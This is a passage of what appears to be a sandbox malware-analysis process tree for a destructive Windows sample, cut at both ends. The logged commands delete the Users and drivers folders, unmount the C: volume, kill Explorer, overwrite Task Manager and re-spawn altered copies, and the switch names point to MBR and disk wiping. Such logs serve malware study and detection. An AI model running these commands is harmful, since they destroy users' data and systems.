      C:\Windows\system32\cmd.exe /c del /q C:\windows\system32\drivers
      4⤵
      PID:3444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /KillHardDisk 1697996445
  2⤵
  PID:5324
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /KillHardDisk 1697996445
    3⤵
    PID:3192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:8496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol c: /d
      4⤵
      PID:11900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:6952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /killMBR 1697996445
  2⤵
  PID:4908
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /killMBR 1697996445
    3⤵
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  PID:3328
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
    3⤵
    PID:10256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d07.exe 1697996445
      4⤵
      PID:9520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /autoup 1697996445
  2⤵
  PID:11188
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /autoup 1697996445
    3⤵
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe C:\windows\system32\taskmgr.exe
  2⤵
  PID:11948

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe 1697996445
1⤵
- Executes dropped EXE
PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
  2⤵
  PID:4616
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
    3⤵
    - Executes dropped EXE
    PID:4620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe 1697996445
      4⤵
      PID:5812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+4306.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
      4⤵
      PID:5300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+729543.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
      4⤵
      PID:3976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe 1697996445
      4⤵
      PID:9536
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe 1697996445
        5⤵
        
        PID:8024
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:10360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:10552
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe /autoup 1697996445
        6⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe /autoup 1697996445
        7⤵
        
        PID:9124
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe /killwindows 1697996445
        6⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe /killwindows 1697996445
        7⤵
        
        PID:9308
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe /KillHardDisk 1697996445
        6⤵
        
        PID:11176
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe /killMBR 1697996445
        6⤵
        
        PID:9792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
  2⤵
  PID:4056
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
    3⤵
    - Executes dropped EXE
    PID:5280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
  2⤵
  PID:5692
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
    3⤵
    - Executes dropped EXE
    PID:5804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+710532.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
      4⤵
      PID:7152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
  2⤵
  PID:1644
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
    3⤵
    - Executes dropped EXE
    PID:5744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:6156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:6760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+812100.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d018.exe
1⤵
PID:2356

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
1⤵
- Executes dropped EXE
PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+122848.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
  2⤵
  PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe 1697996445
  2⤵
  PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+713836.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
  2⤵
  PID:5640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe 1697996445
  2⤵
  PID:6264
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d057.exe 1697996445
    3⤵
    - Executes dropped EXE
    PID:7052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:7520
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:9276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffded8d46f8,0x7ffded8d4708,0x7ffded8d4718
  2⤵
  PID:3400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:7116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
  2⤵
  PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:7720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:7712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:7896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:7888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:7880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
  2⤵
  PID:7860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,11343489178285794818,11783909710141967540,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3880 /prefetch:8
  2⤵
  PID:7852

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
1⤵
- Executes dropped EXE
PID:1556

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
1⤵
PID:1264

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe 1697996445
1⤵
- Executes dropped EXE
PID:1468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe /save 1697996445
  2⤵
  PID:6196
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe /save 1697996445
    3⤵
    - Executes dropped EXE
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d051.exe /protect 1697996445
  2⤵
  PID:5860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:8000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:10156

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe 1697996445
1⤵
- Executes dropped EXE
PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /save 1697996445
  2⤵
  PID:1968
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /save 1697996445
    3⤵
    - Executes dropped EXE
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /protect 1697996445
  2⤵
  - Executes dropped EXE
  PID:5400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:1376
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:7840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /autoup 1697996445
  2⤵
  PID:9356
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /autoup 1697996445
    3⤵
    PID:6216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /killwindows 1697996445
  2⤵
  PID:10492
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /killwindows 1697996445
    3⤵
    PID:9932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:5288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /KillHardDisk 1697996445
  2⤵
  PID:7012
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /KillHardDisk 1697996445
    3⤵
    PID:9248
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:10896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol c: /d
      4⤵
      PID:8784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:5932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /killMBR 1697996445
  2⤵
  PID:5652
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /killMBR 1697996445
    3⤵
    PID:508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /protect 1697996445
  2⤵
  PID:9116
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /protect 1697996445
    3⤵
    PID:10580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /autoup 1697996445
  2⤵
  PID:10692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe C:\windows\system32\taskmgr.exe
  2⤵
  PID:11016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /KillHardDisk 1697996445
  2⤵
  PID:364

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
1⤵
PID:116

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
1⤵
PID:5968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
  2⤵
  PID:6524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe 1697996445
  2⤵
  PID:9520
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe 1697996445
    3⤵
    PID:8424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:9820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:6560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /autoup 1697996445
      4⤵
      PID:7448
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /autoup 1697996445
        5⤵
        
        PID:3816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d04.exe /autoup 1697996445
      4⤵
      PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe
  2⤵
  PID:6996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe 1697996445
  2⤵
  PID:3308
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe 1697996445
    3⤵
    PID:10460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:5344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe /autoup 1697996445
      4⤵
      PID:7404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe /killwindows 1697996445
      4⤵
      PID:11808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d03.exe /killMBR 1697996445
      4⤵
      PID:8604

C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
1⤵
- Executes dropped EXE
PID:6072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
  2⤵
  PID:6444
- C:\Windows\system32\cmd.exe
